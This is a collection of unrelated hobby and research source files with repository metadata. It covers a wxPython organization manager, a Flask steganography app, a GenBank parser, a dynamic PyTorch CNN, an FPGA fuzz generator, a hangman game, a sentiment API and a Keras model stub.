sdbxConf["preScript"] = preScript
sdbxConf["script"] = script
dtkglobal.orgDict[sdbxName] = sdbxConf
dtkglobal.StoreOrgs()
self.consoleOutputTextCtrl.AppendText("Organization added with name: " + sdbxName)
self.consoleOutputTextCtrl.AppendText(os.linesep)
dtkglobal.ReadOrgs()
self.Parent.GetPage(0).organizationComboBox.Items = dtkglobal.orgList
self.Parent.GetPage(1).organizationComboBox.Items = dtkglobal.orgList
self.Parent.GetPage(2).organizationListBox.Items = dtkglobal.orgList
class ManageOrgsFrame(wx.Frame):
def __init__(self, parent=None):
super(ManageOrgsFrame, self).__init__(parent, title="Organizations")
myStream = dtkglobal.getImageStream()
myImage = wx.Image(myStream)
myBitmap = wx.Bitmap(myImage)
icon = wx.Icon()
icon.CopyFromBitmap(myBitmap)
self.SetIcon(icon)
# dtkglobal.MakeModal(self, True)
self.InitUI()
def InitUI(self):
self.panel = wx.Panel(self)
self.nb = wx.Notebook(self.panel)
self.nb.AddPage(ManageSandboxPanel(self.nb), "Manage Sandboxes")
self.nb.AddPage(AddSandboxPanel(self.nb), "Add Sandbox")
self.nb.AddPage(ManageOrganizationPanel(self.nb), "Manage Organizations")
self.nb.AddPage(AddOrganizationPanel(self.nb), "Add Organization")
self.mainSizer = wx.GridBagSizer(5, 5)
row = 0
col = 0
spanV = 0
spanH = 2
self.mainSizer.Add(self.nb, pos=(row, col), flag=wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border=5)
self.mainSizer.AddGrowableCol(0)
self.mainSizer.AddGrowableRow(0)
self.panel.SetSizerAndFit(self.mainSizer)
self.mainSizer.Fit(self)
self.Layout()
self.Centre()
self.MinSize = self.Size
self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)
self.Show()
def OnCloseWindow(self, event):
self.Destroy()
```
|
{
"source": "jesus1554/FotoCrytpo",
"score": 2
}
|
#### File: jesus1554/FotoCrytpo/views.py
```python
from flask import Flask, request, session, render_template, flash, redirect, url_for, send_file
from werkzeug.security import generate_password_hash, check_password_hash
from flask_sqlalchemy import SQLAlchemy
from cryptosteganography import CryptoSteganography
from double_auth import send_verfication
from random import randint
from app import *
import os
allowedFiles = ['jpg', 'png', 'jpeg']
def deletePrevious():
import glob
files = glob.glob('./upload/*')
for fl in files:
os.remove(fl)
def indexView():
if "username" in session:
return render_template('home.html', username=session['username'])
return render_template('index.html')
def encryptView():
if request.method == 'POST':
deletePrevious()
f = request.files['image']
filename = f.filename
extentionFile = filename.split('.')
imgPath = f'./upload/{filename}'
password = request.form['password']
message = request.form['message']
outputName = f"./upload/{extentionFile[0]}-encr.png"
simpleOutput = f'{extentionFile[0]}-encr.png'
if extentionFile[1] in allowedFiles:
f.save(imgPath)
else:
flash('Extensión de archivo no permitida', 'danger')
return redirect(url_for('index'))
# Encrypting File
crypto_steganography = CryptoSteganography(password)
crypto_steganography.hide(imgPath, outputName, message)
flash('Se guardó correctamente', 'success')
return render_template('encrypt.html', outfile=simpleOutput)
return render_template('encrypt.html')
def decryptView():
pass
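# the decrypt view above is still a stub; a possible flow is sketched here purely as an
# illustration (it is NOT the project's implementation). It assumes the CryptoSteganography
# object exposes retrieve(path) returning the hidden message (or None for a wrong password)
# and that a 'decrypt.html' template exists.
def decryptViewSketch():
    if request.method == 'POST':
        deletePrevious()
        f = request.files['image']
        imgPath = f'./upload/{f.filename}'
        f.save(imgPath)
        crypto_steganography = CryptoSteganography(request.form['password'])
        secret = crypto_steganography.retrieve(imgPath)
        if secret is None:
            flash('No se pudo recuperar el mensaje', 'danger')
        return render_template('decrypt.html', message=secret)
    return render_template('decrypt.html')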
def loginView():
if request.method == "POST":
user = User.query.filter_by(
email=request.form["email"]
).first()
if user and check_password_hash(user.password, request.form["password"]):
session["username"] = user.username
return redirect(url_for('index'))
flash('Tus credenciales son inválidas, inténtalo de nuevo', 'danger')
return render_template('login.html')
def signupView():
global pin
global newUser
if request.method == "POST":
if int(request.form['code']) > 0:
usrcode = int(request.form['code'])
if pin == usrcode:
confirmedUser = User(
username = newUser['username'],
email = newUser['email'],
                    password = newUser['password']
)
db.session.add(confirmedUser)
db.session.commit()
pin = randint(1000, 9999)
newUser = None
return redirect(url_for('login'))
else:
flash('Incorrecto :(', 'danger')
return render_template('confirm.html')
else:
hashed_pw = generate_password_hash(request.form["password"], method="sha256")
newUser = {
'username': request.form["username"],
'email': request.form["email"],
                'password': hashed_pw
}
send_verfication(pin, newUser['email'])
flash("¡Te has registrado exitosamente!", "success")
return render_template('confirm.html', mail=newUser['email'])
return render_template('signup.html')
```
|
{
"source": "JESUS-2120/Python_2",
"score": 3
}
|
#### File: Python_2/Tareas/Secuencias_y_Formatos.py
```python
from Bio.Seq import Seq
from Bio import SeqIO
#We define the function that will take the file path and the list of gene names as arguments
def resumen(path,genes):
    #Read the file and print the data we are interested in
for register in SeqIO.parse(path,"genbank"):
organismo = register.annotations["organism"]
version = register.annotations["sequence_version"]
source = register.features[0]
print(f"Organismo = {organismo}")
print(f"Version = {version}")
print("Fuente de aislamiento ",source.qualifiers["isolation_source"])
print("Pais",source.qualifiers["country"])
        '''We build a structure with two nested for loops that lets us walk through
        the genbank file looking for the sequences of the genes whose names are
        in the list, so that we can print them afterwards'''
for j in range(0, len(genes)):
gen = "['"+genes[j]+"']"
for i in range(2, len(register.features) , 2):
if (str(gen) == str(register.features[i].qualifiers["gene"]) ):
start = register.features[i].location.nofuzzy_start
end = int(start) + 15
sec = register.seq[start:end]
print(f"Gene = {genes[j]}")
print(f"DNA = {sec}")
print(f"RNA = {sec.transcribe()}")
print(f"PROTEINA = {sec.translate()}")
gen = ""
#Greet the user in a friendly way
print("Bienvenido a Secuencias y Formatos :D\n")
desicion = input("Desea usar el archivo genbank por default? [S/N]: ")
#Ask the user whether they want to provide their own genbank file and store the path
if desicion == "S":
path = "../files/virus.gb"
else:
path = str(input("Introduzca la ruta de su arcivo genbank: "))
#Ask the user to enter the gene names for the list
print("Intoduzca su lista de nombres de genes")
c = int(input("Ingrese cuantos nombres hay en su lista: "))
i = 0
Gen = []
while i < c:
i += 1
print("Ingrese el nombre: ")
nombre_user = input().upper()
Gen.append(nombre_user)
resumen(path,Gen)
```
|
{
"source": "jesus-333/Dynamic-PyTorch-Net",
"score": 3
}
|
#### File: Dynamic-PyTorch-Net/Old file/DynamicNet_OLD.py
```python
import torch
from torch import nn
from support_DynamicNet import getActivationList, getPoolingList, convOutputShape
import numpy as np
from tqdm import tqdm
import matplotlib.pyplot as plt
class DynamicCNN(nn.Module):
def __init__(self, parameters, print_var = False, tracking_input_dimension = False):
super().__init__()
self.print_var = print_var
self.tracking_input_dimension = tracking_input_dimension
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Parameters recovery and check
# Set device for the training/execution
if("device" in parameters.keys()): self.device = parameters["device"]
else: self.device = device = torch.device("cpu")
# Set the number of layers for convolutional part
if("layers_cnn" in parameters.keys()):
layers_cnn = int(parameters["layers_cnn"]) #0
if(print_var): print("Layer CNN: {}".format(layers_cnn))
else:
layers_cnn = 0;
if(print_var): print("Layer CNN: {}".format(layers_cnn))
# raise Exception("No \"layers_cnn\" key inside the paramters dictionary")
# Set the number of layers for linear part
if("layers_ff" in parameters.keys()):
layers_ff = int(parameters["layers_ff"]) #1
if(print_var): print("Layer Linear: {}".format(layers_ff))
else:
layers_ff = 0
if(print_var): print("Layer Linear: {}".format(layers_ff))
# raise Exception("No \"layers_ff\" key inside the paramters dictionary")
if(layers_cnn == 0 and layers_ff == 0): raise Exception("Both \"layers_cnn\" and \"layers_ff\" are set to 0. You must have at least one layer.")
self.layers_cnn, self.layers_ff = layers_cnn, layers_ff
# Set activation functions for each layer
act = getActivationList()
if("activation_list" in parameters.keys()):
activation_list = parameters["activation_list"]
# Check activation list length (N.B the +1 is added because there is the flatten layer between the cnn and the feed-forward part)
if(len(activation_list) != layers_cnn + layers_ff + 1): raise Exception("wrong number of elements in activation_list")
# Create the activation list of the two part of the network
activation_list_cnn = activation_list[0:layers_cnn]
activation_list_ff = activation_list[(layers_cnn + 1):]
activation_flatten = activation_list[layers_cnn]
if(print_var): print("Activation CNN: {}\nActivation Linear: {}\nActivation Flatten: {}".format(activation_list_cnn, activation_list_ff, activation_flatten))
else:
raise Exception("No \"activation_list\" key inside the paramters dictionary")
if(layers_cnn != 0):
# Set kernel list
if("kernel_list" in parameters.keys() and layers_cnn != 0):
kernel_list = convertTupleElementToInt(parameters["kernel_list"])
# Check kernel list length
if(len(kernel_list) != layers_cnn): raise Exception("Wrong number of elements in kernel_list")
if(print_var): print("Kernels: {}".format(kernel_list))
else:
if(print_var): print("Kernels: {}".format(kernel_list))
# raise Exception("No \"kernel_list\" key inside the paramters dictionary")
# Set filter list
if("filters_list" in parameters.keys() and layers_cnn != 0):
filters_list = convertTupleElementToInt(parameters["filters_list"])
# Check filter list length
if(len(filters_list) != layers_cnn): raise Exception("Wrong number of elements in filters_list")
if(print_var): print("Filters/Channels: {}".format(filters_list))
else:
raise Exception("No \"filters_list\" key inside the paramters dictionary")
# Set stride list
if("stride_list" in parameters.keys() and layers_cnn != 0):
stride_list = convertTupleElementToInt(parameters["stride_list"])
# Check stride list length
if(len(stride_list) != layers_cnn): raise Exception("Wrong number of elements in stride_list")
if(print_var): print("Stride List: {}".format(stride_list))
else:
                # If no stride is provided create a vector to set every stride to the default value of Conv2d
stride_list = np.ones(layers_cnn).astype(int)
if(print_var): print("Stride List: {}".format(stride_list))
# Set padding list
if("padding_list" in parameters.keys() and layers_cnn != 0):
padding_list = convertTupleElementToInt(parameters["padding_list"])
# Check padding list length
if(len(padding_list) != layers_cnn): raise Exception("Wrong number of elements in padding_list")
if(print_var): print("Padding List: {}".format(padding_list))
else:
                # If no padding is provided create a vector to set every padding to the default value of Conv2d
padding_list = np.zeros(layers_cnn).astype(int)
if(print_var): print("Padding List: {}".format(padding_list))
# Set pooling list
if("pooling_list" in parameters.keys() and layers_cnn != 0):
pooling_list = parameters["pooling_list"]
# Check pooling length
if(len(pooling_list) != layers_cnn): raise Exception("Wrong number of elements in pooling_list")
if(print_var): print("Pooling List: {}".format(pooling_list))
else:
# If no pooling provided create a vector of negative number so no pool layer will be added
pooling_list = np.ones(layers_cnn).astype(int) * -1
if(print_var): print("Pooling List: {}".format(pooling_list))
# Set groups list
if("groups_list" in parameters.keys() and layers_cnn != 0):
groups_list = parameters["groups_list"]
# Check group length
if(len(groups_list) != layers_cnn): raise Exception("Wrong number of elements in group_list")
if(print_var): print("Groups List: {}".format(groups_list))
else:
                # If no groups are provided create a vector of ones so the groups will be set to their default value of 1
groups_list = np.ones(layers_cnn).astype(int)
if(print_var): print("Groups List: {}".format(groups_list))
# Set Batch Normalization list
if("CNN_normalization_list" in parameters.keys() and layers_cnn != 0):
CNN_normalization_list = parameters["CNN_normalization_list"]
# Check batch_normalization_list list length
if(len(CNN_normalization_list) != layers_cnn): raise Exception("Wrong number of elements in CNN_normalization_list")
if(print_var): print("CNN Normalization: {}".format(CNN_normalization_list))
else:
# If no Batch was provided create a vector of negative number so no Batch layer will be added
CNN_normalization_list = np.ones(layers_cnn).astype(int) * -1
CNN_normalization_list = CNN_normalization_list > 100
if(print_var): print("CNN Normalization: {}".format(CNN_normalization_list))
# Set dropout list
if("dropout_list" in parameters.keys()):
dropout_list = parameters["dropout_list"]
# Check dropout list length
if(len(dropout_list) != layers_cnn + layers_ff + 1): raise Exception("Wrong number of elements in dropout_list")
dropout_list_cnn = dropout_list[0:layers_cnn]
dropout_list_ff = dropout_list[(layers_cnn + 1):]
dropout_flatten = dropout_list[layers_cnn]
if(print_var): print("Dropout List: {}".format(dropout_list))
else:
# If no dropout was provided create a vector of negative number so no dropout layer will be added
dropout_list = np.ones(layers_cnn + layers_ff + 1).astype(int) * -1
dropout_list_cnn = dropout_list[0:layers_cnn]
dropout_list_ff = dropout_list[(layers_cnn + 1):]
dropout_flatten = dropout_list[layers_cnn]
if(print_var): print("Dropout List: {}".format(dropout_list))
# Set bias list
if("bias_list" in parameters.keys()):
bias_list = parameters["bias_list"]
# Check bias list length
if(len(bias_list) != layers_cnn + layers_ff + 1): raise Exception("Wrong number of elements in bias_list")
bias_list_cnn = bias_list[0:layers_cnn]
bias_list_ff = bias_list[(layers_cnn + 1):]
bias_list_flatten = bias_list[layers_cnn]
if(print_var): print("Bias List: {}".format(bias_list))
else:
# If no bias was provided create a vector of negative number so no bias will be added
bias_list = np.ones(layers_cnn + layers_ff + 1).astype(int) * -1
bias_list = bias_list < 1000
bias_list_cnn = bias_list[0:layers_cnn]
bias_list_ff = bias_list[(layers_cnn + 1):]
bias_list_flatten = bias_list[layers_cnn]
if(print_var): print("Bias List: {}".format(bias_list))
# Set neuron list
if("neurons_list" in parameters.keys()):
neurons_list = parameters["neurons_list"]
# Check activation list length
if(len(neurons_list) != layers_ff): raise Exception("Wrong number of elements in neurons_list")
if(layers_ff != 1): neurons_list = convertArrayInTupleList(neurons_list)
if(print_var): print("Neurons List: {}".format(neurons_list))
else:
# raise Exception("No \"Neurons_list\" key inside the paramters dictionary")
neurons_list = []
if(print_var): print("Neurons List: {}".format(neurons_list))
# Add a empty line
if(print_var): print()
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# CNN Construction
# Temporary variable used to track the change in dimensions of the input
if(layers_cnn != 0):
tmp_input = torch.ones((1, filters_list[0][0], parameters["h"], parameters["w"]))
if(tracking_input_dimension):
print("# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ")
print(tmp_input.shape, "\n")
            # Temporary list to store the layers
tmp_list = []
# Construction cycle
for kernel, n_filter, stride, padding, pool, activation, normalization, p_dropout, groups, bias in zip(kernel_list, filters_list, stride_list, padding_list, pooling_list, activation_list_cnn, CNN_normalization_list, dropout_list_cnn, groups_list, bias_list_cnn):
# Create the convolutional layer and add to the list
if(groups == 1): tmp_cnn_layer = nn.Conv2d(in_channels = int(n_filter[0]), out_channels = int(n_filter[1]), kernel_size = kernel, stride = stride, padding = padding, bias = bias)
else: tmp_cnn_layer = nn.Conv2d(in_channels = int(n_filter[0]), out_channels = int(n_filter[1]), kernel_size = kernel, stride = stride, padding = padding, groups = groups, bias = bias)
tmp_list.append(tmp_cnn_layer)
                # Keep track of the output dimension
tmp_input = tmp_cnn_layer(tmp_input)
# Print the input dimensions at this step (if tracking_input_dimension is True)
if(tracking_input_dimension):
print(tmp_cnn_layer)
print(tmp_input.shape, "\n")
# (OPTIONAL) add batch normalization
if(normalization): tmp_list.append(nn.BatchNorm2d(num_features = int(n_filter[1])))
# (OPTIONAL) Add the activation
if(activation != -1): tmp_list.append(act[activation])
# (OPTIONAL) Add max pooling
if(pool != -1):
# Retrieve the pooling list (with a cast to int for the kernel)
pool_kernel = (int(pool[1][0]), int(pool[1][1]))
pool_layer_list = getPoolingList(kernel = pool_kernel)
# Create the pool layer and add to the list.
tmp_pooling_layer = pool_layer_list[pool[0]]
tmp_list.append(tmp_pooling_layer)
# Keep track of the output dimension
tmp_input = tmp_pooling_layer(tmp_input)
# Print the input dimensions at this step (if tracking_input_dimension is True)
if(tracking_input_dimension):
print(tmp_pooling_layer)
print(tmp_input.shape)
# (OPTIONAL) Dropout
if(p_dropout > 0 and p_dropout < 1): tmp_list.append(torch.nn.Dropout(p = p_dropout))
# Creation of the sequential object to store all the layer
self.cnn = nn.Sequential(*tmp_list)
# Plot a separator
if(tracking_input_dimension): print("# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #\n")
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Flatten layer
self.flatten_neurons = tmp_input.shape[1] * tmp_input.shape[2] * tmp_input.shape[3]
if(layers_ff == 0):
if(activation_flatten != -1): self.flatten_layer = act[activation_flatten]
else: self.flatten_layer = nn.Identity()
if(print_var): print("Flatten layer: {}\n".format(self.flatten_neurons))
else:
if(layers_ff == 1): tmp_flatten_layer = nn.Linear(self.flatten_neurons, neurons_list[0], bias = bias_list_flatten)
else: tmp_flatten_layer = nn.Linear(self.flatten_neurons, neurons_list[0][0], bias = bias_list_flatten)
tmp_list = []
tmp_list.append(tmp_flatten_layer)
if(activation_flatten != -1): tmp_list.append(act[activation_flatten])
if(dropout_flatten > 0 and dropout_flatten < 1): tmp_list.append(torch.nn.Dropout(p = dropout_flatten))
self.flatten_layer = nn.Sequential(*tmp_list)
if(print_var):
if(layers_ff == 1): print("Flatten layer: {}\n".format([self.flatten_neurons, neurons_list[0]]))
else: print("Flatten layer: {}\n".format([self.flatten_neurons, neurons_list[0][0]]))
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Feed-Forward (Linear) construction
if(layers_ff > 1):
# Temporary list to store the layers
tmp_list = []
# Construction cycle
for neurons, activation, p_dropout, bias in zip(neurons_list, activation_list_ff, dropout_list_ff, bias_list_ff):
if(layers_ff == 1 and layers_cnn == 0): # Case for a single layer feed-forward network (perceptron style)
tmp_linear_layer = nn.Linear(parameters["h"] * parameters["w"], neurons, bias = bias)
else:
tmp_linear_layer = nn.Linear(neurons[0], neurons[1], bias = bias)
tmp_list.append(tmp_linear_layer)
# (OPTIONAL) Add the activation
if(activation != -1): tmp_list.append(act[activation])
# (OPTIONAL) Dropout
if(p_dropout > 0 and p_dropout < 1): tmp_list.append(torch.nn.Dropout(p = p_dropout))
# Creation of the sequential object to store all the layers
self.ff = nn.Sequential(*tmp_list)
else: self.ff = []
def forward(self, x):
if(self.layers_cnn != 0):
# Convolutional section
x = self.cnn(x)
# Flatten layer
x = x.view([x.size(0), -1])
x = self.flatten_layer(x)
# Feed-forward (linear) section
if(len(self.ff) > 0): x = self.ff(x)
return x
def printNetwork(self, separator = False):
depth = 0
# Iterate through the module of the network
for name, module in self.named_modules():
# Iterate through the sequential block
# Since in the iteration both the sequential blocks and the modules inside them appear, I only take the sequential blocks
if(type(module) == torch.nn.modules.container.Sequential):
for layer in module:
# Print layer
print("DEPTH:", depth, "\t- ", layer)
# Increase depth
depth += 1
if(separator): print("\n- - - - - - - - - - - - - - - - - - - - - - - - - - - \n")
if(name == 'cnn'):
# Add reshape "layer"
print("DEPTH:", depth, "\t- ", "x.view([x.size(0), -1])")
if(separator): print("\n- - - - - - - - - - - - - - - - - - - - - - - - - - - \n")
depth += 1
def getMiddleResults(self, x, input_depth, ignore_dropout = True):
actual_depth = 0
# Iterate through the module of the network
for name, module in self.named_modules():
# Iterate through the sequential block
# Since in the iteration both the sequential blocks and the modules inside them appear, I only take the sequential blocks
if(type(module) == torch.nn.modules.container.Sequential):
for layer in module:
# Evaluate the value of the input at this level
x = layer(x)
# If I reach the desired level I stop
if(actual_depth == input_depth): return x
# Increase depth level
actual_depth += 1
# Reshape after the CNN block
if(name == 'cnn'):
x = x.view([x.size(0), -1])
if(actual_depth == input_depth): return x
actual_depth += 1
# If this instruction is reached it means that the input flowed through the entire network.
return x
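# Illustrative sketch (added, not part of the original project): a minimal demo of why the
# two methods above only act on nn.Sequential containers when walking named_modules().
# named_modules() yields both a Sequential container and, separately, every layer stored
# inside it, so handling only the containers and looping over their children visits each
# layer exactly once. The helper below is never called.
def _named_modules_demo():
    class Toy(nn.Module):
        def __init__(self):
            super().__init__()
            self.cnn = nn.Sequential(nn.Conv2d(1, 8, kernel_size = 3), nn.ReLU())
    for name, module in Toy().named_modules():
        print(name, "->", type(module).__name__)
    # Expected output:
    #        -> Toy
    # cnn    -> Sequential
    # cnn.0  -> Conv2d
    # cnn.1  -> ReLU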
#%%
def convertArrayInTupleList(array):
"""
Convert an array (or a list) of elements into a list of tuples, where each tuple contains two consecutive elements of the original array/list
Parameters
----------
array : numpy array/list
Returns
-------
tuple_list : list of tuples
Given the input array = [a, b, c, d ...] the tuple_list will be [(a, b), (b, c), (c, d) ...]
"""
tuple_list = []
for i in range(len(array) - 1):
tmp_tuple = (array[i], array[i + 1])
tuple_list.append(tmp_tuple)
return tuple_list
def convertTupleElementToInt(tuple_list):
"""
Convert a list of tuples into the same list of tuples but with the tuple elements cast to int
N.B. The tuples must contain two elements
"""
tuple_int_list = []
for tup in tuple_list:
tmp_tuple = (int(tup[0]), int(tup[1]))
tuple_int_list.append(tmp_tuple)
return tuple_int_list
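# Illustrative usage sketch (added, not part of the original project): how the two helpers
# above can be combined to build, for example, a filters_list of int tuples for the network
# constructor. The helper below is never called.
def _tuple_helpers_demo():
    channels = [1, 32, 64]
    filters_list = convertTupleElementToInt(convertArrayInTupleList(channels))
    print(filters_list)  # [(1, 32), (32, 64)]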
```
|
{
"source": "Jesus89/icestorm-debian",
"score": 2
}
|
#### File: icestorm-debian/icefuzz/make_fflogic.py
```python
from fuzzconfig import *
import numpy as np
import os
os.system("rm -rf work_fflogic")
os.mkdir("work_fflogic")
def random_op():
return np.random.choice(["+", "-", "*", "^", "&", "|"])
def print_seq_op(dst, src1, src2, op, f):
mode = np.random.choice(list("abc"))
negreset = np.random.choice(["!", ""])
enable = np.random.choice(["if (en) ", ""])
if mode == "a":
print(" always @(%sedge clk) begin" % np.random.choice(["pos", "neg"]), file=f)
print(" %s%s <= %s %s %s;" % (enable, dst, src1, op, src2), file=f)
print(" end", file=f)
elif mode == "b":
print(" always @(%sedge clk) begin" % np.random.choice(["pos", "neg"]), file=f)
print(" if (%srst)" % negreset, file=f)
print(" %s <= %d;" % (dst, np.random.randint(2**16)), file=f)
print(" else", file=f)
print(" %s%s <= %s %s %s;" % (enable, dst, src1, op, src2), file=f)
print(" end", file=f)
elif mode == "c":
print(" always @(%sedge clk, %sedge rst) begin" % (np.random.choice(["pos", "neg"]), "neg" if negreset == "!" else "pos"), file=f)
print(" if (%srst)" % negreset, file=f)
print(" %s <= %d;" % (dst, np.random.randint(2**16)), file=f)
print(" else", file=f)
print(" %s%s <= %s %s %s;" % (enable, dst, src1, op, src2), file=f)
print(" end", file=f)
else:
assert False
for idx in range(num):
with open("work_fflogic/fflogic_%02d.v" % idx, "w") as f:
print("module top(input clk, rst, en, input [15:0] a, b, c, d, output [15:0] y, output z);", file=f)
print(" reg [15:0] p, q;", file=f)
print_seq_op("p", "a", "b", random_op(), f)
print_seq_op("q", "c", "d", random_op(), f)
print(" assign y = p %s q, z = clk ^ rst ^ en;" % random_op(), file=f)
print("endmodule", file=f)
with open("work_fflogic/Makefile", "w") as f:
print("all: %s" % " ".join(["fflogic_%02d.bin" % i for i in range(num)]), file=f)
for i in range(num):
print("fflogic_%02d.bin:" % i, file=f)
print("\t-bash ../icecube.sh fflogic_%02d > fflogic_%02d.log 2>&1 && rm -rf fflogic_%02d.tmp || tail fflogic_%02d.log" % (i, i, i, i), file=f)
```
|
{
"source": "Jesus98Sotelo/Hangman-Game-Python",
"score": 4
}
|
#### File: Jesus98Sotelo/Hangman-Game-Python/Hangman-Game.py
```python
import random
import os
import hanged as h
hh = h.HANGMAN_IMAGES
def play(word, underscord):
wordList = list(word)
underscordList = list(underscord)
lyric = ''
while wordList != underscordList or lyric == ' ':
lyric = input('Tu primer intento : ')
accountant = 1
os.system('cls')
for i in range(0, len(wordList)):
if wordList[i] == lyric:
underscordList[i] = wordList[i]
print(' '.join(underscordList).upper())
print("""Ganaste!!!
+----+
|
|
\O/ |
| |
/ \ |
=========
""")
def normalize(s):
replacements = (
("á", "a"),
("é", "e"),
("í", "i"),
("ó", "o"),
("ú", "u"),
)
for a, b in replacements:
s = s.replace(a, b).replace(a.upper(), b.upper())
return s
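# Added note: normalize("canción") returns "cancion" and normalize("MURCIÉLAGO") returns
# "MURCIELAGO"; only the accented vowels listed in `replacements` are substituted.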
def read():
with open('./docs/data.txt', 'r', encoding='utf-8') as f:
words = [i.replace('\n', '') for i in f]
random_word = random.randint(0, len(words) - 1)  # randint is inclusive, so cap at len(words) - 1 to avoid an IndexError
word = words[random_word]
return word
def run():
print("""
____ _ _ _
| _ \ (_) (_) | |
| |_) | _ ___ _ __ __ __ ___ _ __ _ __| | ___ __ _
| _ < | | / _ \ | '_ \ \ \ / / / _ \ | '_ \ | | / _` | / _ \ / _` |
| |_) | | | | __/ | | | | \ V / | __/ | | | | | | | (_| | | (_) | | (_| |
|____/ |_| \___| |_| |_| \_/ \___| |_| |_| |_| \__,_| \___/ \__,_|
_ _
| | | |
| |__| | __ _ _ __ __ _ _ __ ___ __ _ _ __
| __ | / _` | | '_ \ / _` | | '_ ` _ \ / _` | | '_ \
| | | | | (_| | | | | | | (_| | | | | | | | | (_| | | | | |
|_| |_| \__,_| |_| |_| \__, | |_| |_| |_| \__,_| |_| |_|
__/ |
|___/
No te ahorques y adivina la palabra antes, solo contarás con 6 oportunidades.
Instrucciones:
1.- Solo puedes teclear una letra.
2.- Ganas si adivinas la palabra
3.- Pierdes si completas el ahorcado (Cuentas con 6 intentos)
_____ ____ __ __ ______ _ _ ______ ______ __ __ ____ _____
/ ____| / __ \ | \/ | | ____| | \ | | |___ / | ____| | \/ | / __ \ / ____|
| | | | | | | \ / | | |__ | \| | / / | |__ | \ / | | | | | | (___
| | | | | | | |\/| | | __| | . ` | / / | __| | |\/| | | | | | \___ \
| |____ | |__| | | | | | | |____ | |\ | / /__ | |____ | | | | | |__| | ____) |
\_____| \____/ |_| |_| |______| |_| \_| /_____| |______| |_| |_| \____/ |_____/
""")
print(hh[0])
word = read()
wordNormalize = normalize(word)
underscord = '_' * (len(word))
print(' '.join(underscord))
play(wordNormalize, underscord)
if __name__ == '__main__':
run()
```
|
{
"source": "jesus-acorrales/post-tuto-deployment",
"score": 2
}
|
#### File: src/api/app.py
```python
import sys
import os
import random
from tqdm import tqdm
from flask import Blueprint, request, jsonify, Flask
import torch
import torch.nn.functional as F
import wget
import db
import config
from ml.model import CharacterLevelCNN
from ml.utils import predict_sentiment
app = Flask(__name__)
api = Blueprint('api', __name__)
# Load pytorch model for inference
model_name = 'model_en.pth'
model_path = f'./ml/models/{model_name}'
model = CharacterLevelCNN()
if model_name not in os.listdir('./ml/models/'):
print(f'downloading the trained model {model_name}')
wget.download(
"https://github.com/ahmedbesbes/character-based-cnn/releases/download/model_en_tp_amazon/model_tp_amazon_1014.pth",
out=model_path
)
else:
print('model already saved to api/ml/models')
if torch.cuda.is_available():
trained_weights = torch.load(model_path)
else:
trained_weights = torch.load(model_path, map_location='cpu')
model.load_state_dict(trained_weights)
model.eval()
print('PyTorch model loaded !')
@api.route('/predict', methods=['POST'])
def predict_rating():
'''
Endpoint to predict the rating using the
review's text data.
'''
if request.method == 'POST':
if 'review' not in request.form:
return jsonify({'error': 'no review in body'}), 400
else:
parameters = model.get_model_parameters()
review = request.form['review']
output = predict_sentiment(model, review, **parameters)
return jsonify(float(output))
@api.route('/review', methods=['POST'])
def post_review():
'''
Save review to database.
'''
if request.method == 'POST':
expected_fields = [
'review',
'rating',
'suggested_rating',
'sentiment_score',
'brand',
'user_agent',
'ip_address'
]
if any(field not in request.form for field in expected_fields):
return jsonify({'error': 'Missing field in body'}), 400
query = db.Review.create(**request.form)
return jsonify(query.serialize())
@api.route('/reviews', methods=['GET'])
def get_reviews():
'''
Get all reviews.
'''
if request.method == 'GET':
query = db.Review.select().order_by(db.Review.created_date.desc())
return jsonify([r.serialize() for r in query])
app.register_blueprint(api, url_prefix='/api')
if __name__ == '__main__':
app.run(debug=config.DEBUG, host=config.HOST)
```
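A minimal client sketch for the two POST endpoints above (added here for illustration, not part of the repository). It assumes the API is reachable at `http://localhost:5000` (the Flask default port; the real host and port come from `config`) and that the `requests` package is installed.
```python
import requests

BASE_URL = "http://localhost:5000/api"  # assumed host/port, see config.py

# /predict expects a form field named 'review' and returns the sentiment score as JSON
review_text = "Great quality, fast delivery"
score = requests.post(f"{BASE_URL}/predict", data={"review": review_text}).json()
print("sentiment score:", score)

# /review expects every field listed in `expected_fields`; the values below are illustrative
payload = {
    "review": review_text,
    "rating": 5,
    "suggested_rating": 5,
    "sentiment_score": score,
    "brand": "example-brand",
    "user_agent": "demo-client",
    "ip_address": "127.0.0.1",
}
print(requests.post(f"{BASE_URL}/review", data=payload).json())
```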
#### File: src/api/db.py
```python
import peewee as pw
import config
from datetime import datetime
from playhouse.shortcuts import model_to_dict
db = pw.PostgresqlDatabase(
config.POSTGRES_DB,
user=config.POSTGRES_USER, password=config.POSTGRES_PASSWORD,
host=config.POSTGRES_HOST, port=config.POSTGRES_PORT
)
class BaseModel(pw.Model):
class Meta:
database = db
# Table Description
class Review(BaseModel):
review = pw.TextField()
rating = pw.IntegerField()
suggested_rating = pw.IntegerField()
sentiment_score = pw.FloatField()
brand = pw.TextField()
user_agent = pw.TextField()
ip_address = pw.TextField()
created_date = pw.DateTimeField(default=datetime.now)
def serialize(self):
review_dict = model_to_dict(self)
review_dict["created_date"] = (
review_dict["created_date"].strftime('%Y-%m-%d %H:%M:%S')
)
return review_dict
# Connection and table creation
db.connect()
db.create_tables([Review])
```
|
{
"source": "jesus-a-martinez-v/dermatologist-ai",
"score": 3
}
|
#### File: jesus-a-martinez-v/dermatologist-ai/model.py
```python
import glob
import os
from pathlib import Path
import cv2
import matplotlib.image as mpimg
import numpy as np
from keras import metrics
from keras.applications.inception_resnet_v2 import InceptionResNetV2
from keras.callbacks import EarlyStopping, TensorBoard, ModelCheckpoint, ReduceLROnPlateau
from keras.engine.saving import load_model
from keras.layers import Dense, GlobalAveragePooling2D, Activation, BatchNormalization, LeakyReLU
from keras.models import Model
from keras.preprocessing.image import ImageDataGenerator
from keras.utils.np_utils import to_categorical
BASE_PATH = os.path.join('.', 'data')
TRAIN_DATA = os.path.join(BASE_PATH, 'train')
